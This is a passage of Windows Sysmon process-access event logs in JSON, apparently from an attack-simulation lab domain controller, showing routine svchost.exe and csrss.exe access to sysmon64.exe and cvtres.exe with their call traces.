C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.181","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D4-5F25-0000-0010E7070800}","TargetProcessId":"3840","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5462,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.181\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.181","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5463,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.181\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.181","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5464,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.181\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.181","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5465,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.181\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.181","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5466,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.181\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.181","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5467,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.181\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.181","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5468,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.181\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.181","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5469,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.181\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 